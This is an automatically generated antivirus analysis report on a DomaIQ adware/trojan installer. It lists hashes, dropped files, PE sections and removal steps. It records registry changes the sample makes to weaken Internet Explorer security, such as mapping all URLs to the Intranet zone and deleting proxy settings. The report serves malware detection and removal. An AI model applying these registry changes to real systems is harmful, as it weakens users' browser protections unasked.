not-a-virus:AdWare.MSIL.DomaIQ.chgb (Kaspersky), Application.Bundler.DomaIQ.Q (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8517aba1e5989d5cc8701b151783808a
SHA1: ad40518e77ecad25586c619af7436d98b39fda85
SHA256: 86aaef044139dacb14692bc5f16988a33a5cc8d4b287cf11919849b75fa11dd1
SSDeep: 6144:b K036Qh8dhkgaMeahKXdWWHzP2dOTy/qCQTdPJ fmvTbCfL1No8pYvV:C3T ahKXdWWw1qf6mvTbMZW8WV
Size: 321088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-07-14 23:09:38
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
%original file name%.exe:668
The Application injects its code into the following process(es):
%original file name%.exe:676
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process %original file name%.exe:676 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress_small_bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Browser appinfo.dfe (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Vuupcinfo.dfe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\less.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-zipper.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\mystart.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1-small.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position4A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Vuupc\info.html (1287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\MyBackupPc\info.html (1419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\mypcbackup.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\DHD6E441\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PIIAQQ9Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bg_app.png (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\show.png (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\jquery.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Wajam\info.html (2473 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\browserapp.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\SM Mystart\info.html (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-gevideoconverter.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\HQVideo-Proinfo.dfe (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\optimizerpro2.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\percentage-bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\mypcbackup.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check-close.png (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\cross.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\HQVideo-Pro\info.html (1089 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet-shortw.gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\more.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-miul.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\logo-win.jpg (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\close.html (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-vafmusic.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-geaudioconverter.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\options.html (965 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-vafplayer.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\boton_xl.jpg (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2-gris.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1-gris.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\PPI OptimizerPro\info.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\boton.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Dockings.dfe (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo3.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\group.html (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\templateStyle.dfe (6468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PIIAQQ9Y\doma[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet-short.gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2-gris-small.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\hq-videopro.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\mystart-toolbar-gris.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo2.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\finish.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\welcome.html (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\base.css (445 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\PPI OptimizerProinfo.dfe (2613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Wajaminfo.dfe (2823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\config.dmc (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2C.css (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U4QB9L07\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\butpause.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-printpdf.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position1A.css (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-ifish.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet.gif (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\MyBackupPcinfo.dfe (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-logo-big.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3D.css (539 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\templateDisplays.dfe (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-big.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1a.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UWC4R3L\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\instalando.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-olivebrowser.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin.dmc (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress_small.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2.png (9 bytes)
%System%\wbem\Logs\wbemprox.log (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\butplay.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\box.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.jpg (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\hide.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.png (398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\vuupc.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3C.css (638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\SM Mystartinfo.dfe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\style.css (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Browser app\info.html (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\wajam.css (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-img.png (1552 bytes)
The process %original file name%.exe:668 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7E.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe (1431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe.config (767 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\09ac72b88ef140aa8ee609de7640785e.txt (8027 bytes)
The Application deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa7D.tmp (0 bytes)
Registry activity
The process %original file name%.exe:676 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1381415142"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD BE FD 00 A1 E4 C1 44 65 3C C7 6E 41 68 94 F1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Application modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Application modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:668 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 45 93 5E 12 7D B6 BF 33 7D E2 21 97 2C B4 09"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| 6c1fa3fd9e135ec4a98cc3deb7b6e90d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe |
| 1dadb63a5dfaa0679485c5dbaf96033f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsv7E.tmp\nsisdl.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:668
- Delete the original Application file.
- Delete or disinfect the files created/modified by the Application (the full list is given under File activity above).
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position1A.css (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-ifish.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet.gif (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\MyBackupPcinfo.dfe (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-logo-big.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3D.css (539 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\templateDisplays.dfe (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-big.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1a.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UWC4R3L\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\instalando.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-olivebrowser.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin.dmc (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress_small.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2.png (9 bytes)
%System%\wbem\Logs\wbemprox.log (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\butplay.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\box.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.jpg (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\hide.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.png (398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\vuupc.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3C.css (638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\SM Mystartinfo.dfe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\style.css (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Browser app\info.html (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\wajam.css (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-img.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7E.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe (1431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe.config (767 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\09ac72b88ef140aa8ee609de7640785e.txt (8027 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23148 | 23552 | 4.44633 | 1c619949741a76b63a54c1e6c4d6b2f8 |
.rdata | 28672 | 4558 | 4608 | 3.62955 | 6c31e0693072284f258d2c4a271de506 |
.data | 36864 | 110520 | 1024 | 3.36948 | 78f5760d9fafb71fdbc88c3497afef46 |
.ndata | 147456 | 61440 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 208896 | 17000 | 17408 | 3.5656 | 7fae611f3f73978e9992534a50a87055 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1515
Network Activity
URLs
URL | IP |
---|---|
